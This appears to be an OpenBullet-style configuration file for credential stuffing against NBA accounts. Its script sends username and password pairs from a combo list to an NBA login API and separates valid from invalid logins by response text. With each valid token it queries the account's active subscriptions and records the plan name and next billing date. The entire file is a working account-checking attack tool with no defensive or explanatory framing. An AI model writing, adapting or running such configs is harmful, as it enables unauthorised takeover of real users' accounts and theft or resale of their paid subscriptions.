[SETTINGS]
{
  "Name": "NBA",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2020-04-16T22:04:56.7814843-04:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "i wanna die#0001",
  "Version": "1.2.1",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://audience.nba.com/core/api/1/user/login" 
  CONTENT "{\"principal\":\"<USER>\",\"credential\":\"<PASS>\",\"identityType\":\"EMAIL\",\"apps\":[\"responsys\",\"billing\",\"preferences\"]}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "User credentials are invalid." 
  KEYCHAIN Success OR 
    KEY "preferences" 

PARSE "<SOURCE>" LR "" "" -> VAR "TOKEN" 

REQUEST GET "https://audience.nba.com/regwall/api/1/subscriptions/active" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: <TOKEN>" 

PARSE "<SOURCE>" LR "description\":\"" "\"" CreateEmpty=FALSE -> CAP "SUBSCRIPTION" 

PARSE "<SOURCE>" LR "nextBillDateMillis\":" "," -> VAR "y" 

FUNCTION UnixTimeToDate "yyyy-MM-dd" "<y>" -> CAP "NEXT BILLING" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "description" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "{\"subscriptions\":[]}" 

